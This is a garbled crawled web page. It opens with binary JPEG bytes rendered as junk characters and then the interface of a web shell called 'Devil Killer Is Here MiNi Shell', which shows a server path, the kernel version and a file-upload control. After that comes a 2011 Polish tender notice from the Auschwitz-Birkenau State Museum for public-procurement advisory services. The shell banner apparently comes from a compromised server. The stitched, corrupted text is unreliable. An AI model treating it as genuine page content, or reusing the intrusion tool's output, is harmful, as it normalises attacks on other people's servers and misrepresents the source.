JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111227/438112-N-2011.html

<p class="kh_header"><b>Oświęcim: usługa doradztwa w zakresie zamówień publicznych i reprezentacji przy prowadzeniu postępowań przetargowych w  ramach projektu, współfinansowanego z grantu bezpośredniego z Komisji Europejskiej pn. Auschwitz - Zachowanie Autentyzmu, dziewięć zadań na lata 2012-2015</b><br>
<b>Numer ogłoszenia: 438112 - 2011; data zamieszczenia: 27.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu , ul. Więźniów Oświęcimia 20, 32-603 Oświęcim, woj. małopolskie, tel. 033 8432022, faks 033 8431934.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.auschwitz.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługa doradztwa w zakresie zamówień publicznych i reprezentacji przy prowadzeniu postępowań przetargowych w  ramach projektu, współfinansowanego z grantu bezpośredniego z Komisji Europejskiej pn. Auschwitz - Zachowanie Autentyzmu, dziewięć zadań na lata 2012-2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu zamówienia.
1. Przedmiotem zamówienia jest świadczenie usług doradztwa w zakresie zamówień publicznych  w przedmiocie   przygotowania i   przeprowadzenia  planowanych  17   postępowań  o   udzielenie 
zamówienia publicznego do momentu zawarcia przez Zamawiającego umów w sprawie  zamówień publicznych realizowanych w ramach projektu, współfinansowanego z grantu bezpośredniego z Komisji Europejskiej pn. Auschwitz - Zachowanie Autentyzmu, dziewięć zadań na lata 2012 - 2015 na  podstawie  stosownych  pełnomocnictw a  także   reprezentacji   Zamawiającego w postępowaniach odwoławczych  przed  Krajową  Izbą  Odwoławczą  w  zakresie wynikającym z toku ww postępowań o udzielenie zamówienia publicznego. Ostateczna ilość postępowań do przeprowadzenia będzie wynikać z faktycznych potrzeb Zamawiającego. Zamawiający przewiduje zwiększenie o 2 (dwa) i zmniejszenie o 2 (dwa) ilości postępowań do przygotowania i przeprowadzenia.

Opis przedmiotu zamówienia
2. Planowane postępowania do przeprowadzenia:
1) Roboty budowlane dotyczące wzmocnienia stropów w bloku o nr inw. A-24 - termin przekazania Zamawiającemu kompletnej SIWZ wraz z załącznikami i wzorem umowy  do  15 marca 2012 r., planowany tryb postępowania: przetarg nieograniczony, szacunkowa wartości przedmiotu zamówienia wynosi  300.000,00 zł. 
2) Roboty budowlane obejmujące montaż SUG w magazynach Zbiorów (blok o nr inw. A-25) - termin przekazania Zamawiającemu kompletnej SIWZ wraz z załącznikami i wzorem umowy  do  28 lutego 2012 r., planowany tryb postępowania: przetarg nieograniczony, szacunkowa wartość przedmiotu zamówienia wynosi   813.008,13 zł.
3) Roboty budowlane obejmujące wykonanie instalacji SUG w magazynach Zbiorów (blok o nr inw. A-19) oraz w Archiwum (blok o nr inw. A-24)  termin przekazania Zamawiającemu kompletnej SIWZ wraz z załącznikami i wzorem umowy  do  28 lutego  2013 r., planowany tryb postępowania: przetarg nieograniczony, szacunkowa wartość przedmiotu zamówienia wynosi   
2.390. 243,90 zł.
4) Roboty budowlane i prace konserwatorskie baraków drewnianych o nr inw. B-154 i B-159 - termin przekazania Zamawiającemu kompletnej SIWZ wraz z załącznikami i wzorem umowy  do  15 lipca 2012 r., planowany tryb postępowania przetarg nieograniczony, szacunkowa wartość przedmiotu zamówienia  wynosi 1.599.268,29 zł. 
5) Usługa nadzoru konserwatorskiego nad ww robotami i pracami w barakach - termin przekazania Zamawiającemu kompletnej SIWZ wraz z załącznikami i wzorem umowy  do  15 lipca 2012 r., przewidywany tryb postępowania przetarg nieograniczony, szacunkowa wartość przedmiotu zamówienia wynosi 61.788,62 zł.
6) Usługa nadzoru inwestorskiego nad ww robotami i pracami  w barakach,  termin przekazania Zamawiającemu kompletnej SIWZ wraz z załącznikami i wzorem umowy  do  15 lipca 2012 r., przewidywana procedura przetarg nieograniczony, szacunkowa wartość przedmiotu zamówienia wynosi 60.162,60 zł. 
7) Usługa wykonania, dostawy i montażu  specjalistycznych szaf na eksponaty - związana z zadaniem Modernizacji magazynów na walizy, termin przekazania Zamawiającemu kompletnej SIWZ wraz z załącznikami i wzorem umowy  do  30 kwietnia 2012 r., przewidywany tryb postępowania przetarg nieograniczony, szacunkowa wartość przedmiotu zamówienia wynosi 2.170.007,32 zł.
8) Usługa dezynfekcji zabytkowych waliz - związana z zadaniem Modernizacji magazynów na walizy, termin przekazania Zamawiającemu kompletnej SIWZ wraz z załącznikami i wzorem umowy  do  31 lipca 2012 r., przewidywany tryb postępowania przetarg nieograniczony, szacunkowa wartość przedmiotu zamówienia wynosi  357.723,58 zł.
9) Dostawa sprzętu UPS i dysków do macierzy dla Repozytorium Cyfrowego - związana z zadaniem Rozbudowa systemu długoterminowego przechowywania danych oraz Repozytorium Cyfrowego - termin przekazania Zamawiającemu kompletnej SIWZ wraz z załącznikami i wzorem umowy  do  31 maja 2012 r., planowany tryb postępowania przetarg nieograniczony, szacunkowa wartość przedmiotu postępowania wynosi 231.707,32 zł.
10) Usługa rozbudowy Repozytorium Cyfrowego polegająca na stworzeniu, zainstalowaniu i wdrożeniu dodatkowych modułów do programu komputerowego obsługującego Repozytorium Cyfrowe - związana z zadaniem Rozbudowa systemu długoterminowego przechowywania danych oraz Repozytorium Cyfrowego - termin przekazania Zamawiającemu kompletnej SIWZ wraz z załącznikami i wzorem umowy  do  31 maja 2012 r., planowana procedura przetarg nieograniczony, szacunkowa wartość przedmiotu zamówienia wynosi 158.536,59 zł.
11) Dostawa komory klimatycznej do Pracowni Konserwatorskiej - związana z zadaniem Zakup sprzętu do pracowni konserwatorskiej - termin przekazania Zamawiającemu kompletnej SIWZ wraz z załącznikami i wzorem umowy  do  28 lutego 2012 r., planowany tryb przetarg nieograniczony, szacunkowa wartość przedmiotu zamówienia wynosi  69.105,69 zł.
12) Dostawa specjalistycznej szlifierki do Pracowni Konserwatorskiej - związana z zadaniem Zakup sprzętu do pracowni konserwatorskiej - termin przekazania Zamawiającemu kompletnej SIWZ wraz z załącznikami i wzorem umowy  do  30 kwietnia 2013 r., przewidywany tryb przetarg nieograniczony, szacunkowa wartość przedmiotu zamówienia wynosi 73.170,73 zł.
13) Dostawa urządzenia XRF do Pracowni Konserwatorskiej - związana z zadaniem Zakup sprzętu do pracowni konserwatorskiej - termin przekazania Zamawiającemu kompletnej SIWZ wraz z załącznikami i wzorem umowy  do  30 kwietnia 2014 r., planowany tryb przetarg nieograniczony, szacunkowa wartość przedmiotu zamówienia wynosi 121.951,22 zł.
14) Usługa konserwacji tałesów - związana z zadaniem Konserwacja waliz i tałesów oraz konserwacja i skanowanie dokumentów archiwalnych - termin przekazania Zamawiającemu kompletnej SIWZ wraz z załącznikami i wzorem umowy  do  31 stycznia 2013 r., planowany tryb przetarg nieograniczony, szacunkowa wartość postępowania wynosi 121.951,22 zł.
15) Usługa obejmująca wykonanie badań archeologicznych terenu odcinka B I usytuowanego na terenie Muzeum - związana z zadaniem Badanie terenu dotyczące odcinka B I wraz z przylegającym terenem oczyszczalników (Auschwitz II-Birkenau) termin przekazania Zamawiającemu kompletnej SIWZ wraz z załącznikami i wzorem umowy  do  31 marca 2012 r., zakładany tryb przetarg nieograniczony, szacunkowa wartość przedmiotu zamówienia wynosi  516.260,16 zł,
16) Usługa obejmująca wykonanie badań hydrogeologicznych terenu odcinka BI znajdującego się na terenie Muzeum - związana z zadaniem Badanie terenu dotyczące odcinka B I wraz z przylegającym terenem oczyszczalników (Auschwitz II-Birkenau) - termin przekazania Zamawiającemu kompletnej SIWZ wraz z załącznikami i wzorem umowy  do  31 marca 2012 r., zakładany tryb przetarg nieograniczony, szacunkowa wartość przedmiotu zamówienia wynosi  256.097,56 zł.
17) Usługa audytu finansowego - termin przekazania Zamawiającemu kompletnej SIWZ wraz z załącznikami i wzorem umowy  do  31 marca 2012 r., planowany tryb przetarg nieograniczony, szacunkowa wartość przedmiotu zamówienia wynosi  109.264,72 zł.
3. Wykonawca będzie realizował przedmiot zamówienia w zakresie wskazanym przez Zamawiającego w Zleceniu. Zakres usług będzie obejmował w szczególności:
3.1. Każde z ww postępowań będzie realizowane w następujących etapach:
Etap I 
a) weryfikacja pod względem formalno-prawnym opisu przedmiotu zamówienia, 
b) weryfikacja trybu udzielenia zamówienia,
c) ustalenie warunków udziału w postępowaniu jakie muszą spełnić Wykonawcy ubiegający się o dane zamówienie,
d) ustalenie kryteriów oceny ofert,
e) sporządzenie wzoru umowy,
f) sporządzenie specyfikacji istotnych warunków zamówienia zawierającą wszystkie elementy wymagane prawem,
g) sporządzenie ogłoszenia o zamówieniu,
h) niezwłoczne udzielanie wyjaśnień i odpowiedzi Zamawiającemu dotyczących przygotowanych dokumentów.
Etap II
a) sporządzanie odpowiedzi na wpływające pytania do specyfikacji istotnych warunków zamówienia,
b) sporządzenie modyfikacji specyfikacji istotnych warunków zamówienia,
c) sporządzanie ogłoszeń o zmianie ogłoszenia,
d) niezwłoczne sporządzanie odpowiedzi na informacje wniesione przez Wykonawców na czynności podjęte lub zaniechane przez Zamawiającego w toku postępowania o udzielenie zamówienia publicznego,
e) sporządzanie ustawowo wymaganych pism wynikających z toku postępowania,
f) niezwłoczne udzielanie wyjaśnień i odpowiedzi Zamawiającemu dotyczących przygotowanych dokumentów.
Etap III
a)	uczestnictwo w procesie badania i oceny złożonych ofert, w szczególności w ocenie prawno-formalnej ofert, spełnienia warunków udziału w postępowaniu przez Wykonawców, spełnienia wymagań w ramach opisu przedmiotu zamówienia wraz z udziałem w posiedzeniach komisji i sporządzaniem notatek z jej posiedzenia,
b)	sporządzenie ustawowo wymaganych pism (m.in. wezwań, zawiadomień, informacji) kierowanych do Wykonawców w toku procesu badania i oceny ofert,
c)	sporządzenie rozstrzygnięć postępowań (m. in. zawiadomień o wyborze najkorzystniejszej oferty, informacji o unieważnieniu postępowania),
d) sporządzenie na bieżąco protokołu z postępowania,
e) sporządzenie ogłoszenia o udzieleniu zamówienia,
f) udzielanie wyjaśnień i odpowiedzi Zamawiającemu dotyczących przygotowanych dokumentów.
3.2. Zamawiający zastrzega, że podział postępowań na etapy nie jest równoznaczny z dopuszczeniem rozliczenia częściowego. Sposób rozliczenia będzie wynikał ze Zleceń, przy czym Zlecenie będzie wystawiane  na poszczególne postępowania, o których mowa w dziale III pkt 2 niniejszej SIWZ lub ich części. Wynagrodzenie za postępowanie będzie ustalane przez Zamawiającego na podstawie sumy cen jednostkowych za etapy w danym postępowaniu podane w formularzu ofertowym (załącznik nr 1 do SIWZ). 
4. Wykonawca jest zobowiązany do wykonywania innych czynności niezbędnych do przeprowadzenia postępowań, o których mowa w dziale III pkt 2.
5. Dodatkowo niezależnie od etapów postępowania zakres usług doradczych będzie obejmował:
5.1. sporządzenie ekspertyz, analiz i opinii do umów zawartych przez Zamawiającego w wyniku przeprowadzonych postępowań o których mowa w pkt 2 działu III - zakładana liczba godzin to 160.  
5.2. sporządzanie odpowiedzi na złożone odwołania,
5.3. reprezentowanie Zamawiającego przed Krajową Izbą Odwoławczą,
6. Zamawiający zastrzega, że przygotowana przez Wykonawcę  kompletna SIWZ wraz z załącznikami i  wzorem  umowy  będzie  podlegać   zatwierdzeniu  przez  Zamawiającego i  Komisję   Europejską. W przypadku braku w/w zatwierdzenia, Wykonawca będzie zobowiązany do niezwłocznego przystąpienia do skorygowania dokumentów, w terminie określonym przez Zamawiającego, w taki sposób aby ostatecznie zostały zatwierdzone..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.11.10.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda oferta musi być zabezpieczona wadium w wysokości: 7.000,00 zł 
(słownie:  siedem tysięcy złotych PLN 00/100)
	Wadium należy wnieść przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał lub wykonuje należycie  w okresie trzech ostatnich lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym  okresie usług polegających na: 
a) świadczeniu na rzecz innego Zamawiającego w sposób ciągły przez okres co najmniej 12 miesięcy,  co najmniej 1 (jednej) usługi doradztwa w zakresie zamówień publicznych rozumianej jako umowa lub zlecenie, odebranej dokumentem potwierdzającym jej należyte wykonane o wartości nie mniejszej niż 50 000 zł brutto za okres 12 miesięcy,
b)	przygotowaniu i przeprowadzeniu co najmniej 2 (dwóch) postępowań o udzielenie zamówienia publicznego prowadzonych według ustawy Pzp., w tym:
- 1 (jednego) o wartości zamówienia mniejszej niż kwoty określone w § 1 pkt 2) lit. a
rozporządzenia Prezesa Rady Ministrów z dnia 23 grudnia 2009 r. w sprawie kwot wartości
zamówień oraz konkursów, od których jest uzależniony obowiązek przekazywania ogłoszeń 
Urzędowi   Oficjalnych Publikacji Wspólnot Europejskich, 
-  1 (jednego) o wartości zamówienia równej lub przekraczającej kwoty określone w § 1 pkt 2), lit. a  rozporządzenia Prezesa Rady Ministrów z dnia 23 grudnia 2009 r. w sprawie kwot wartości
zamówień oraz konkursów, od których jest uzależniony obowiązek przekazywania
ogłoszeń  Urzędowi  Oficjalnych  Publikacji  Wspólnot  Europejskich,  
c) świadczeniu usługi reprezentacji przed Krajową Izbą Odwoławczą obejmującej co najmniej 1 (jedną)  reprezentacje (uwzględnienie odwołania, oddalenie odwołania lub odrzucenie  odwołania),  w tym  przygotowywania projektów pism na potrzeby postępowania odwoławczego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował 2 osobami o następującym wykształceniu, kwalifikacjach i doświadczeniu:
a) co najmniej jedną osobą z wykształceniem prawniczym, posiadającą co najmniej trzyletnie doświadczenie  zawodowe  w  stosowaniu  przepisów  o  zamówieniach  publicznych,  w której    w     zakresie  obowiązków  należało  doradztwo dla innych Zamawiających z zakresu zamówień publicznych,
b) co najmniej jedną osobą, która w okresie ostatnich 3 lat przed upływem terminu składania ofert, co najmniej 1  -krotnie występowała jako pełnomocnik w postępowaniach przed Krajową 
Izbą Odwoławczą</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada:
a) ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę (suma gwarancyjna w odniesieniu do jednego zdarzenia) co najmniej 400.000 zł,
b) środki finansowe lub zdolność kredytową w wysokości 100. 000 zł,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy:
1)	w zakresie terminów, o których mowa w dziale III pkt 2 jeżeli dochowanie terminów przewidzianych w umowie stało się niemożliwe z przyczyn obiektywnych,
2)	w zakresie terminów płatności wynikających ze zmian wprowadzonych do umowy, 
3)	w zakresie sposobu  rozliczania poszczególnych Zleceń poprzez wprowadzenie możliwości rozliczenia częściowego,
